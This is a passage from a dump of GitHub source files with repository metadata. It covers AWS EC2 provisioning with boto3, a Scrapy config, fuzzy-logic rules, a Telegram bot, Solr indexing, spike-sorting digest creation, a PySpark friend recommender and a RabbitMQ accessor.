fits.getdata(os.path.join(path_to_dm_maps, f'dm{dmnum}_command_2d_noflat.fits'))\n surfaces.append(actuators_2d)\n\n return surfaces[0], surfaces[1]\n","repo_name":"spacetelescope/PASTIS","sub_path":"pastis/simulators/hicat_imaging.py","file_name":"hicat_imaging.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"29"} +{"seq_id":"6852027905","text":"# coding: utf-8\nimport boto3\nimport os\nimport stat\n\n# Create Session\nsession = boto3.Session(profile_name=\"Liam\")\nec2 = session.resource('ec2')\n\n# Creating SSH Key\nkey_name = 'ec2_automation_key'\nkey_path = key_name + \".pem\"\nkey = ec2.create_key_pair(KeyName=key_name)\nwith open(key_path,'w') as f:\n f.write(key.key_material)\nos.chmod(key_path,stat.S_IRUSR |stat.S_IWUSR)\n\n# Creating EC2 Instance\nec2.images.filter(Owners=['amazon'])\nimg = ec2.Image(\"ami-0323c3dd2da7fb37d\")\nami_name = 'amzn2-ami-hvm-2.0.20200406.0-x86_64-gp2'\nfilters = [{\"Name\":\"name\",\"Values\":[ami_name]}]\ninstances = ec2.create_instances(ImageId = img.id,MinCount=1,MaxCount=1,InstanceType='t2.micro',KeyName=key.key_name)\ninst = instances[0]\ninst.reload()\n\n# Configure SecurityGroup\nsg = ec2.SecurityGroup(inst.security_groups[0][\"GroupId\"])\n\n# ssh for personal IP\nsg.authorize_ingress(IpPermissions=[{\"FromPort\":22,\"ToPort\":22,\"IpProtocol\":\"TCP\",\"IpRanges\":[{\"CidrIp\":\"162.222.59.204/32\"}]}])\n\n# HTTP for all\nsg.authorize_ingress(IpPermissions=[{\"FromPort\":80,\"ToPort\":80,\"IpProtocol\":\"TCP\",\"IpRanges\":[{\"CidrIp\":\"0.0.0.0/0\"}]}])\n","repo_name":"LiamWoodRoberts/automatingAWS","sub_path":"nodeotron/ec2_example.py","file_name":"ec2_example.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"28981256247","text":"# Scrapy settings for bostonsing project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/topics/settings.html\n#\n\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '../..'))\n\nBOT_NAME = 'bostonsing'\nBOT_VERSION = '1.0'\n\nSPIDER_MODULES = ['bostonsing.spiders']\nNEWSPIDER_MODULE = 'bostonsing.spiders'\nUSER_AGENT = '%s/%s' % (BOT_NAME, BOT_VERSION)\n\n","repo_name":"marktgodfrey/fasolaminutes_parsing","sub_path":"bostonsing/bostonsing/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"13538813601","text":"\"\"\"\nLuferov Victor \n\nFuzzy Rules\n\"\"\"\nfrom typing import List\nfrom .terms import Term\nfrom .types import OperatorType, HedgeType\nfrom .variables import FuzzyVariable, SugenoVariable, SugenoFunction\n\n\nclass SingleCondition:\n \"\"\"\n Единичное заключение\n FuzzyVariable - Term\n SugenoVariable - SugenoFunction\n \"\"\"\n\n def __init__(self, variable: [FuzzyVariable, SugenoVariable], term: [Term, SugenoFunction], not_: bool = False):\n self.variable: [FuzzyVariable, SugenoVariable] = variable\n self.term: [Term, SugenoFunction] = term\n self.not_: bool = not_\n\n\nclass Conditions:\n\n def __init__(self, conditions: [List, None] = None, op: OperatorType = OperatorType.AND, not_: bool = False):\n self.conditions: List = conditions if conditions is not None else []\n self.op: OperatorType = op\n self.__not: bool = not_\n\n @property\n def not_(self):\n return self.__not\n\n\nclass FuzzyCondition(SingleCondition):\n \"\"\"\n Fuzzy rule\n \"\"\"\n\n def __init__(self,\n variable: [FuzzyVariable, SugenoVariable],\n term: [Term, SugenoFunction],\n not_: bool = False,\n hedge: HedgeType = HedgeType.NULL):\n\n super().__init__(variable, term, not_)\n self.hedge: HedgeType = hedge\n\n\nclass FuzzyRule:\n \"\"\"\n Обобщенная модель нечеткого правила\n - Нечеткое условие \"condition\" для Sugeno и Mamdani одинаковые\n\n - Нечеткое заключение conclusion для Sugeno\n conclusion: SingleConclusion = SingleConclusion(SugenoVariable, SugenoFunction, not?)\n - Нечеткое заключение conclusion для Mamdani\n conclusion: SingleConclusion = SingleConclusion(FuzzyVariable, Term, not?)\n \"\"\"\n\n def __init__(self, condition: Conditions, conclusion: SingleCondition, weight: float = 1.):\n \"\"\"\n Конструктоур нечеткого правила мамдани\n :param condition: условие в блоке IF\n :param conclusion: условие в блоке THEN\n :param weight: дополнительный вес правила\n \"\"\"\n self.condition: Conditions = condition\n self.conclusion: SingleCondition = conclusion\n self.weight: float = weight\n","repo_name":"Luferov/FuzzyLogicToolBox","sub_path":"fuzzy_logic/rules.py","file_name":"rules.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"29"} +{"seq_id":"2524684084","text":"# 1번 풀이: 정석적으로 재귀를 이용해 품\r\n# n분할이 아닌 K의 수를 줄이는 방식으로 진행\r\n# 0번이 k가 1일때임을 주의\r\nimport sys\r\nK = int(sys.stdin.readline())\r\n\r\n\r\ndef d_c(order, count):\r\n if not order:\r\n return count\r\n expo = len(format(order, 'b'))\r\n x = order - 2**(expo-1)\r\n return d_c(x, count+1)\r\n\r\n\r\nprint(d_c(K-1, 0) % 2)\r\n\r\n\r\n# 2번 풀이: 처음 생각한 풀이 2진수에서 0와 1이 flip 할 때 count 를 늘림\r\n# 즉 2진수에서 1의 개수를 세고 2로나눈 나머지\r\n\r\nimport sys\r\nK = int(sys.stdin.readline())\r\nprint(format(K-1, 'b').count('1') % 2)\r\n\r\n","repo_name":"mnmsgit/ProblemSolving","sub_path":"백준/Silver/18222. 투에-모스 문자열/투에-모스 문자열.py","file_name":"투에-모스 문자열.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9082102302","text":"#polygon algorithm\ndef raycasting(p,poly):\n #for each point; p is port location, poly is eca areas\n flag = False\n polygon = tuple(poly[:])+(poly[0],)\n for i in range(0,(len(polygon) - 1)):\n j = i + 1\n sx = polygon[i]['Latitude']\n sy = polygon[i]['Longitude']\n tx = polygon[j]['Latitude']\n ty = polygon[j]['Longitude']\n\n x = np.NaN\n #points within two poly points y axis\n if ((p[1] < ty and p[1] > sy) or (p[1] < sy and p[1] > ty)):\n #points on straight line\n x = sx + (p[1] - sy)*(tx - sx)/(ty - sy)\n\n #points on the line\n if x == p[0]:\n flag = True\n\n #raycasting line\n if x > p[0]:\n flag = not flag\n\n #polygon points concide with ports location\n if ((sx == p[0] and sy == p[1]) or (tx == p[0] and ty == p[1])):\n flag = True\n\n return flag\n\n\n","repo_name":"triangel8866/PNpoly-algorithm","sub_path":"PNpoly.py","file_name":"PNpoly.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"26961230419","text":"import sys\r\nsys.path.append(\"..\")\r\n\r\nfrom telethon import TelegramClient, events\r\nfrom telethon.tl.custom import Button\r\nfrom config import *\r\nfrom sql import Sql\r\nfrom json import loads, dumps\r\n\r\nkey = 'help_theme_no_3'\r\n\r\nasync def commandHelpThemeNo3(event, answer):\r\n chat = event.chat_id\r\n\r\n prev = loads(Sql.getCache(chat)[0][3])\r\n\r\n prev['answer'] = prev['answer'][:2]\r\n prev['answer'].append(answer[0])\r\n\r\n Cache = dumps(prev)\r\n Sql.updateCache(chat, \"c3\", Cache)\r\n\r\n if int(answer[0]) == 2:\r\n markup = [[Button.inline(f\"Да\", f'help_theme_no_3_1:0'.encode()), Button.inline(f\"Нет\", f'help_theme_no_3_1:1'.encode())]]\r\n \r\n return \"Вы обучаетесь в университете РФ?\", markup\r\n\r\n markup = [[Button.inline(f\"Да, получаю высшее образование\", f'help_theme_no_4_1:0'.encode())], [Button.inline(f\"Да, получаю среднее профессиональное образование\", f'help_theme_no_4_2:0'.encode())],\r\n [Button.inline(f\"Нет, не получаю\", f'help_theme_no_4_1_0:0'.encode())]]\r\n \r\n return \"Получаете ли вы образование?\", markup","repo_name":"SuRoryz/accel-2023-bot","sub_path":"commands/commandHelpThemeNo3.py","file_name":"commandHelpThemeNo3.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"24191488052","text":"import os\nimport io\nimport csv\nimport json\nimport pysolr\nfrom nltk import tokenize\nfrom nltk.corpus import stopwords\nimport collections\nimport pandas as pd\n\n\n\"\"\"Indexing all the files to Apache-solr server\"\"\"\n\nclass indexing:\n\n \"\"\"\n Reading files from the data set(local disk) and storing it with\n corresponding filename.\n \"\"\"\n def readfiles(self,path):\n data=[] #to store data in the file\n file_list=[] #to store the name of the files\n for file in sorted(os.listdir(path),key=lambda x: int(x.split('.')[0])):\n with io.open(path + file, 'r', encoding='utf-8', errors='ignore') as f:\n data.append(f.read())\n file_list.append(file)\n return data,file_list\n\n \"\"\"\n Tokenizing each files and storing it in the data list\n \"\"\"\n def tokenizing(self,data):\n\n for i in range(len(data)):\n sentences = tokenize.sent_tokenize(data.pop(i).strip())\n temp = sentences.pop(0).split('\\n\\n')\n if len(temp) == 2:\n sentences.insert(0, temp[1])\n data.insert(i, sentences)\n return data\n\n \"\"\"\n Performing word tokenizing for each files and \n removing the stopwords like 'the','that'...etc \n \"\"\"\n def indexing_words(self,data,file_list):\n indexedWord=collections.OrderedDict()\n indexedSentence = collections.OrderedDict()\n for i in range(len(data)):\n index=file_list[i]\n indexedWord[index]=[]\n for sentence in data[i]:\n indexedWord[index].extend(list(set(tokenize.word_tokenize(sentence))))\n indexedWord[index]=self.removing_stopwords(indexedWord[index])\n return indexedWord\n\n \"\"\"\n Removing stopwords\n \"\"\"\n def removing_stopwords(self,indexedwords):\n stop_words=stopwords.words(\"english\")\n temp=[]\n for word in indexedwords:\n if word.lower() not in stop_words:\n temp.append(word)\n return temp\n\n\n \"\"\"\n Starting of preprocessing\n \"\"\"\n def preprocess(self,path):\n print(\"Preprocessing...\")\n data,file_list=self.readfiles(path)\n data=self.tokenizing(data)\n indexWord=self.indexing_words(data,file_list)\n\n wordsDFrame = pd.DataFrame(list(indexWord.items()), columns=['id', 'words'])\n jsonFileName = 'words.json'\n wordsDFrame.to_json(jsonFileName, orient='records')\n return jsonFileName,indexWord,data,file_list\n\n \"\"\"\n Adding the json file to Apache-solr\n \"\"\"\n def add_to_solr(self,jsonFileName):\n solr=pysolr.Solr('http://localhost:8983/solr/semantic')\n solr.delete(q='*:*')\n with open(\"/Users/dinesh dk/Documents/mindtree/code/\" + jsonFileName,'rb') as jsonFile:\n entry = json.load(jsonFile)\n solr.add(entry)\n #print(\"added\")\n\n \"\"\"performing searching in Apache-solr\"\"\"\n def searchInSolr(self,query, indexSentenceMap,data,file_list):\n solr = pysolr.Solr('http://localhost:8983/solr/semantic')\n query = \"words:\" + \" || words:\".join(query)\n print(\"Search Query: \", query)\n results = solr.search(query)\n for result in results:\n d=result['id']\n ind=file_list.index(d)\n print(d,\"\".join(data[ind]),sep=\"\\n\")\n print(\"\\n\\n\")\n\n\n def returnpath(self):\n return \"/Users/dinesh dk/Documents/mindtree/Data Set/\"\n\n\n\nif __name__ == '__main__':\n indexing_obj=indexing()\n path=\"/Users/dinesh dk/Documents/mindtree/Data Set/\"\n jsonfilename,indexwords,data,file_list=indexing_obj.preprocess(path)\n indexing_obj.add_to_solr(jsonfilename)\n # query=input(\"Enter the query:\")\n # indexing_obj.searchInSolr(list(set(tokenize.word_tokenize(query))),indexwords,data,file_list)","repo_name":"dineshdk1100/Semantic-Search-Engine","sub_path":"code/indexing.py","file_name":"indexing.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25312943672","text":"from typing import Union\nimport os\nimport json\nimport numpy as np\nimport numpy.typing as npt\nimport zarr\nfrom .helpers.compute_templates import compute_templates\nfrom .helpers.compute_correlogram_data import compute_correlogram_data\nfrom .helpers.extract_snippets import extract_snippets_in_channel_neighborhood\nfrom .SpikeTrains import SpikeTrains, SpikeTrain\nfrom .Autocorrelograms import create_autocorrelograms\nfrom .CrossCorrelograms import create_cross_correlograms\nfrom .AverageWaveforms import AverageWaveforms, AverageWaveformItem\n\ndef create_spike_sorting_digest(*,\n recording,\n sorting,\n output_path: str,\n num_channels_per_neighborhood: int,\n subsample_segment_duration_sec: float,\n subsample_total_duration_sec: float\n):\n if not output_path.endswith('.ns-ssd'):\n raise Exception('Output path must end with .ns-ssd')\n \n print(f'Creating spike sorting digest...')\n print(f'Output path: {output_path}')\n\n # require that output folder does not exist\n if os.path.exists(output_path):\n raise Exception(f'Output folder already exists: {output_path}')\n \n # create the output folder\n os.makedirs(output_path)\n \n import spikeinterface as si\n\n recording: si.BaseRecording = recording\n sorting: si.BaseSorting = sorting\n\n unit_ids = serialize_ids(sorting.get_unit_ids())\n channel_ids = serialize_ids(recording.get_channel_ids())\n\n print('Creating autocorrelograms.ns-acg...')\n create_autocorrelograms(\n sorting=sorting,\n output_path=f'{output_path}/autocorrelograms.ns-acg',\n )\n\n print(f'Creating spike_trains.ns-spt...')\n spike_trains: list[SpikeTrain] = []\n for unit_id in unit_ids:\n spike_times = sorting.get_unit_spike_train(unit_id, segment_index=0)\n spike_trains.append(SpikeTrain(\n unit_id=unit_id,\n spike_times_sec=spike_times.astype(np.float32)\n ))\n X = SpikeTrains(\n start_time_sec=0,\n end_time_sec=recording.get_num_frames() / recording.get_sampling_frequency(),\n spike_trains=spike_trains\n )\n X.save(f'{output_path}/spike_trains.ns-spt', block_size_sec=300)\n\n data_zarr_fname = f'{output_path}/data.zarr'\n data_zarr_root_group = zarr.open(data_zarr_fname, mode=\"w\")\n\n # Extracting subsampled traces\n print('Extracting subsampled traces...')\n subsampled_traces = get_subsampled_traces(\n recording=recording,\n segment_duration_sec=subsample_segment_duration_sec,\n total_duration_sec=subsample_total_duration_sec\n )\n\n # Writing subsampled traces\n print('Writing subsampled traces...')\n data_zarr_root_group.create_dataset(\"subsampled_traces\", data=subsampled_traces, chunks=(1000000, len(channel_ids)))\n\n # Creating subsampled sorting\n print('Creating subsampled sorting...')\n subsampled_sorting = get_subsampled_sorting(\n recording=recording,\n sorting=sorting,\n segment_duration_sec=subsample_segment_duration_sec,\n total_duration_sec=subsample_total_duration_sec\n )\n\n # Creating subsampled_spike_trains.ns-spt\n print('Creating subsampled_spike_trains.ns-spt...')\n spike_trains: list[SpikeTrain] = []\n for unit_id in unit_ids:\n spike_times = subsampled_sorting.get_unit_spike_train(unit_id, segment_index=0)\n spike_trains.append(SpikeTrain(\n unit_id=unit_id,\n spike_times_sec=spike_times.astype(np.float32)\n ))\n X = SpikeTrains(\n start_time_sec=0,\n end_time_sec=subsample_total_duration_sec,\n spike_trains=spike_trains\n )\n X.save(f'{output_path}/subsampled_spike_trains.ns-spt', block_size_sec=300)\n\n # Computing full templates\n print('Computing full templates...')\n full_templates = compute_templates(traces=subsampled_traces, sorting=subsampled_sorting)\n\n # Writing full templates\n print('Writing full templates...')\n data_zarr_root_group.create_dataset(\"full_templates\", data=full_templates, chunks=(1000, 1000, len(channel_ids)))\n\n # determine peak channels from full templates\n print('Determining peak channels...')\n peak_channel_indices = np.argmin(np.min(full_templates, axis=1), axis=1)\n peak_channel_ids = [channel_ids[i] for i in peak_channel_indices]\n\n # determine channel neighborhoods from channel locations and peak channels\n print('Determining channel neighborhoods...')\n channel_neighborhoods = []\n for i, unit_id in enumerate(unit_ids):\n peak_channel_id = peak_channel_ids[i]\n peak_channel_index = channel_ids.index(peak_channel_id)\n channel_locations = recording.get_channel_locations()\n peak_channel_location = channel_locations[peak_channel_index]\n channel_distances = np.linalg.norm(channel_locations - peak_channel_location, axis=1)\n # use the closest num_channels_per_neighborhood channels\n channel_neighborhood_indices = np.argsort(channel_distances)[:num_channels_per_neighborhood]\n channel_neighborhood = [channel_ids[i] for i in channel_neighborhood_indices]\n channel_neighborhoods.append({\n 'unit_id': unit_id,\n 'channel_ids': channel_neighborhood,\n 'channel_indices': channel_neighborhood_indices,\n 'peak_channel_id': peak_channel_id\n })\n\n avg_waveforms_list: list[AverageWaveformItem] = []\n \n for unit_id in unit_ids:\n print(f'Processing unit {unit_id}...')\n unit_folder = f'{output_path}/units/{unit_id}'\n os.makedirs(unit_folder)\n\n channel_neighborhood = [x for x in channel_neighborhoods if x['unit_id'] == unit_id][0]\n subsampled_spike_times = subsampled_sorting.get_unit_spike_train(unit_id, segment_index=0)\n subsampled_snippets_in_neighborhood = extract_snippets_in_channel_neighborhood(traces=subsampled_traces, times=subsampled_spike_times, neighborhood=channel_neighborhood[\"channel_indices\"], T1=30, T2=30)\n\n channel_neighborhood_indices = channel_neighborhood['channel_indices']\n channel_locations_in_neighborhood = np.array(recording.get_channel_locations())[channel_neighborhood_indices]\n\n average_waveform_in_neighborhood = np.median(subsampled_snippets_in_neighborhood, axis=0)\n\n # spike amplitudes\n peak_channel_index_in_neighborhood = np.argmin(np.min(average_waveform_in_neighborhood, axis=0))\n subsampled_spike_amplitudes = np.min(subsampled_snippets_in_neighborhood[:, :, peak_channel_index_in_neighborhood], axis=1)\n\n # write unit_info.json\n unit_info = {\n 'channel_neighborhood_ids': channel_neighborhood['channel_ids'],\n 'channel_neighborhood_locations': serialize_channel_locations(channel_locations_in_neighborhood),\n 'peak_channel_id': channel_neighborhood['peak_channel_id'],\n 'num_subsampled_events': len(subsampled_spike_times)\n }\n print(f' Num. channels in neighborhood: {len(channel_neighborhood[\"channel_ids\"])}')\n print(f' Peak channel: {channel_neighborhood[\"peak_channel_id\"]}')\n print(f' Num. subsampled events: {len(subsampled_spike_times)}')\n with open(f'{unit_folder}/unit_info.json', 'w') as f:\n json.dump(unit_info, f, indent=2)\n # open data.zarr\n unit_data_zarr_fname = f'{unit_folder}/data.zarr'\n unit_data_zarr_root_group = zarr.open(unit_data_zarr_fname, mode=\"w\")\n unit_data_zarr_root_group.create_dataset(\"subsampled_spike_times\", data=subsampled_spike_times.astype(np.float32), chunks=(100000,))\n unit_data_zarr_root_group.create_dataset(\"average_waveform_in_neighborhood\", data=average_waveform_in_neighborhood.astype(np.float32), chunks=(1000, 1000))\n unit_data_zarr_root_group.create_dataset(\"subsampled_snippets_in_neighborhood\", data=subsampled_snippets_in_neighborhood.astype(np.float32), chunks=(1000, 100, 50))\n unit_data_zarr_root_group.create_dataset(\"subsampled_spike_amplitudes\", data=subsampled_spike_amplitudes.astype(np.float32), chunks=(10000,))\n\n avg_waveforms_list.append(AverageWaveformItem(\n unit_id=unit_id,\n channel_ids=channel_neighborhood['channel_ids'],\n waveform=average_waveform_in_neighborhood\n ))\n \n # Writing average_waveforms.awf\n print('Writing average_waveforms.ns-awf...')\n channel_locations_dict = {}\n for i in range(len(channel_ids)):\n channel_locations_dict[str(channel_ids[i])] = recording.get_channel_locations()[i, :].tolist()\n X_avg_waveforms = AverageWaveforms(\n average_waveforms=avg_waveforms_list,\n channel_locations=channel_locations_dict\n )\n X_avg_waveforms.save(f'{output_path}/average_waveforms.ns-awf')\n \n # Computing unit template correlations\n print('Computing unit template correlations...')\n all_correlations = []\n for i, unit_id1 in enumerate(unit_ids):\n template1 = full_templates[i, :, :]\n for j, unit_id2 in enumerate(unit_ids):\n if j <= i:\n continue\n template2 = full_templates[j, :, :]\n correlation = np.corrcoef(template1.ravel(), template2.ravel())[0, 1]\n all_correlations.append({\n 'unit_id1': unit_id1,\n 'unit_id2': unit_id2,\n 'correlation': correlation\n })\n kk = 20\n # Choose the best kk correlations for each unit\n unit_pair_ids = []\n for unit_id in unit_ids:\n correlations = [x for x in all_correlations if x['unit_id1'] == unit_id]\n correlations = sorted(correlations, key=lambda x: x['correlation'], reverse=True)\n for i in range(min(kk, len(correlations))):\n unit_pair_ids.append([correlations[i]['unit_id1'], correlations[i]['unit_id2']])\n print(f'Using {len(unit_pair_ids)} unit pairs for similarity comparison.')\n\n # Creating cross_correlograms.ccg\n print('Creating cross_correlograms.ns-ccg...')\n create_cross_correlograms(\n sorting=subsampled_sorting,\n unit_pairs=unit_pair_ids,\n output_path=f'{output_path}/cross_correlograms.ns-ccg'\n )\n\n # create spike_sorting_digest_info.json\n spike_sorting_digest_info = {\n 'channel_ids': channel_ids,\n 'sampling_frequency': float(recording.get_sampling_frequency()),\n 'num_frames': int(recording.get_num_frames()),\n 'unit_ids': unit_ids,\n 'unit_pair_ids': unit_pair_ids,\n 'channel_locations': serialize_channel_locations(recording.get_channel_locations())\n }\n print(f'Num. channels: {len(channel_ids)}')\n print(f'Num. units: {len(unit_ids)}')\n print(f'Num. unit pairs: {len(unit_pair_ids)}')\n print(f'Num. frames: {spike_sorting_digest_info[\"num_frames\"]}')\n with open(f'{output_path}/spike_sorting_digest_info.json', 'w') as f:\n json.dump(spike_sorting_digest_info, f, indent=2)\n\n print('Done creating spike sorting digest.')\n\ndef get_chunk_sizes_and_spacing(*,\n num_frames: int,\n sampling_frequency: float,\n segment_duration_sec: float,\n total_duration_sec: float\n):\n if total_duration_sec * sampling_frequency >= num_frames:\n # if the total duration is longer than the recording, then just use the entire recording\n return [num_frames], 0\n \n # use chunks of segment_duration_sec seconds\n chunk_size = int(sampling_frequency * min(segment_duration_sec, total_duration_sec))\n # the number of chunks depends on the total duration\n num_chunks = int(np.ceil(total_duration_sec * sampling_frequency / chunk_size))\n chunk_sizes = [chunk_size for i in range(num_chunks)]\n chunk_sizes[-1] = int(total_duration_sec * sampling_frequency - (num_chunks - 1) * chunk_size)\n if num_chunks == 1:\n # if only 1 chunk, then just use the initial chunk\n return chunk_sizes, 0\n else:\n # the spacing between the chunks\n spacing = int((num_frames - np.sum(chunk_sizes)) / (num_chunks - 1))\n return chunk_sizes, spacing\n\ndef get_subsampled_traces(\n recording, *,\n segment_duration_sec: float,\n total_duration_sec: float\n) -> npt.NDArray:\n import spikeinterface as si\n\n recording: si.BaseRecording = recording\n\n chunk_sizes, spacing = get_chunk_sizes_and_spacing(\n num_frames=recording.get_num_frames(),\n sampling_frequency=recording.sampling_frequency,\n segment_duration_sec=segment_duration_sec,\n total_duration_sec=total_duration_sec\n )\n\n num_chunks = len(chunk_sizes)\n if num_chunks == 1:\n # if only 1 chunk, then just use the initial chunk\n traces = recording.get_traces(start_frame=0, end_frame=int(total_duration_sec * recording.sampling_frequency))\n else:\n traces_list: list[np.ndarray] = []\n tt = 0\n for i in range(num_chunks):\n start_frame = tt\n end_frame = int(start_frame + chunk_sizes[i])\n traces_list.append(recording.get_traces(start_frame=start_frame, end_frame=end_frame))\n tt += int(chunk_sizes[i] + spacing)\n traces = np.concatenate(traces_list, axis=0)\n return traces\n\ndef get_subsampled_sorting(\n sorting, *,\n recording,\n segment_duration_sec: float,\n total_duration_sec: float,\n margin_num_frames: int = 100\n):\n import spikeinterface as si\n \n sorting: si.BaseSorting = sorting\n recording: si.BaseRecording = recording\n\n chunk_sizes, spacing = get_chunk_sizes_and_spacing(\n num_frames=recording.get_num_frames(),\n sampling_frequency=recording.sampling_frequency,\n segment_duration_sec=segment_duration_sec,\n total_duration_sec=total_duration_sec\n )\n\n spike_trains_dict = {}\n for unit_id in sorting.get_unit_ids():\n st = sorting.get_unit_spike_train(unit_id, segment_index=0)\n spike_times_list = []\n t_offset = 0\n for i in range(len(chunk_sizes)):\n start_frame = int(i * (chunk_sizes[i] + spacing))\n end_frame = int(start_frame + chunk_sizes[i])\n spike_times_list.append(st[(st >= start_frame + margin_num_frames) & (st < end_frame - margin_num_frames)] - start_frame + t_offset)\n t_offset += chunk_sizes[i]\n spike_times = np.concatenate(spike_times_list)\n spike_trains_dict[unit_id] = spike_times\n\n return si.NumpySorting.from_dict(\n [spike_trains_dict],\n sampling_frequency=recording.sampling_frequency\n )\n\ndef serialize_ids(ids: Union[list, npt.NDArray]) -> list:\n return [id if isinstance(id, str) else int(id) for id in ids]\n\ndef serialize_channel_locations(channel_locations: npt.NDArray) -> list:\n ret = []\n for m in range(channel_locations.shape[0]):\n ret.append({\n 'x': float(channel_locations[m, 0]),\n 'y': float(channel_locations[m, 1])\n })\n return ret","repo_name":"flatironinstitute/neurosift","sub_path":"python/neurosift/views/create_spike_sorting_digest.py","file_name":"create_spike_sorting_digest.py","file_ext":"py","file_size_in_byte":14775,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"29"} +{"seq_id":"815823832","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport sys\nimport re\nimport os\nfrom pyspark import SparkConf, SparkContext\n\n\n# In[2]:\n\n\nconf = SparkConf()\nsc = SparkContext(conf=conf)\nsc.setLogLevel('WARN')\n#loc = \"./soc-LiveJournal1Adj.txt\"\nloc = sys.argv[1]\n\nlines = sc.textFile(loc, 1)\n\n\n# In[3]:\n\n\n## all modified lines are appended to list for easy debugging\nline=list()\nline.append(lines.map(lambda l: re.split('\\t',l)))\nline.append(line[-1].mapValues(lambda l: re.split(',', l)))\nline.append(line[-1].filter(lambda x: x[1][0]!=''))\nline.append(line[-1].flatMap(lambda x: [(x[0],item) for item in x[1]]))\nline.append(line[-1].map(lambda x: (int(x[0]), int(x[1]))))\nline.append(line[-1].map(lambda x: (min(x[0], x[1]), max(x[0], x[1]))))\nline.append(line[-1].distinct().sortByKey())\nline.append(line[-1].groupByKey().mapValues(lambda x: set(x)))\n\n\n# In[4]:\n\n\ndic = line[-1].collectAsMap()\n\n\n# In[14]:\n\n\n## function get_friend returns key-value pair of \n## target and friend's friend list\ndef get_friend(pair):\n target = pair[0]\n friend = pair[1]\n #friend: set, dic: friend dictionary\n #global dic\n #dic = {1: {2, 3, 4}, 2: {3, 5}, 3: {}}\n friendnearby = set()\n for f in friend:\n try:\n ff = dic[f]\n friendnearby=friendnearby.union(ff)\n except KeyError:\n pass\n friendnearby=friendnearby.difference(friend)\n friendnearbylist = list(friendnearby)\n friendnearbylist.sort()\n \n return (target, friendnearbylist)\n\n\n# In[6]:\n\n\nfriend=list()\nfriend.append(line[-1].map(get_friend))\nfriend.append(friend[-1].flatMap(lambda x: [(x[0],item) for item in x[1]]))\n\n\n# In[7]:\n\n\n## this function returns possible pairs\ndef get_mutual(pair):\n f1 = pair[0]\n f2 = pair[1]\n try:\n intersect = dic[f1]&dic[f2]\n count = len(intersect)\n except KeyError:\n count = 0\n return (count, (f1, f2))\n \n\n\n# In[8]:\n\n\nfriend.append(friend[-1].map(get_mutual))\nfriend.append(friend[-1].groupByKey() .mapValues(lambda x: list(x)).sortByKey(ascending=0))\n\n\n# In[9]:\n\n\ndef sort_ppl(x):\n count = x[0]\n ppl_list = x[1]\n sorted_list = sorted(ppl_list, key=lambda tup: tup[0])\n \n return (count, sorted_list)\n\n\n# In[10]:\n\n\nfriend.append(friend[-1].map(sort_ppl))\nfriend.append(friend[-1].flatMap(lambda x: [(x[0],item) for item in x[1]]))\nfriend.append(friend[-1].map(lambda x: (x[1][0], x[1][1], x[0])))\nfriend.append(friend[-1].filter(lambda x: x[2]>0))\n\n\n# In[11]:\n\n\n#output is saved as txt to check output easily\ndef save(filename, contents):\n fh = open(filename, 'w')\n fh.write(contents)\n fh.close()\n\n\n# In[12]:\n\ncount=0\nst=''\nresult = friend[-1].collect()\nfor t in result:\n st+=str(t[0])\n st+='\\t'\n st+=str(t[1])\n st+='\\t'\n st+=str(t[2])\n st+='\\n'\n if(count<10):\n print(str(t[0]),'\\t',str(t[1]),'\\t',str(t[2]))\n count+=1\nsave('hw1-1.txt', st)\n\n\n# In[13]:\n\n# time needed for all this process: 12s\nsc.stop()\n\n","repo_name":"jyparkkr/bigdata_analysis","sub_path":"HW1/python files/hw1_1.py","file_name":"hw1_1.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7692453752","text":"import asyncio\n\nimport aio_pika\nimport json\n\nfrom logging import getLogger\nfrom typing import TYPE_CHECKING, Optional\nfrom yarl import URL\n\nfrom app.base.base_accessor import BaseAccessor\nfrom app.store.vk_api.dataclasses import Update\n\nif TYPE_CHECKING:\n from app.web.app import Application\n\n\nclass RabbitAccessor(BaseAccessor):\n def __init__(self, app: \"Application\", *args, **kwargs):\n super().__init__(app, *args, **kwargs)\n self.logger = getLogger(\"rabbit_accessor\")\n self.rabbit_connection: Optional[aio_pika.Connection] = None\n self.rabbit_channel: Optional[aio_pika.Channel] = None\n self.rabbit_queue: Optional[aio_pika.Queue] = None\n\n async def connect(self, app: \"Application\"):\n rabbit_url = URL.build(\n scheme=\"amqp\",\n user=self.app.config.rabbit.user,\n password=self.app.config.rabbit.password,\n host=self.app.config.rabbit.host,\n port=self.app.config.rabbit.port,\n path=self.app.config.rabbit.vhost,\n )\n self.rabbit_connection = await aio_pika.connect_robust(rabbit_url)\n self.rabbit_channel = await self.rabbit_connection.channel()\n self.rabbit_queue: aio_pika.abc.AbstractQueue = await self.rabbit_channel.declare_queue(self.app.config.rabbit.queue)\n await self.rabbit_queue.consume(self.on_message, no_ack=True)\n\n async def on_message(self, message):\n if message:\n await self.app.store.bots_manager.handle_updates(json.loads(message.body.decode())[0])\n\n async def disconnect(self, app: \"Application\"):\n if self.rabbit_channel:\n await self.rabbit_channel.close()\n if self.rabbit_connection:\n await self.rabbit_connection.close()\n\n async def rabbit_produce(self, updates: 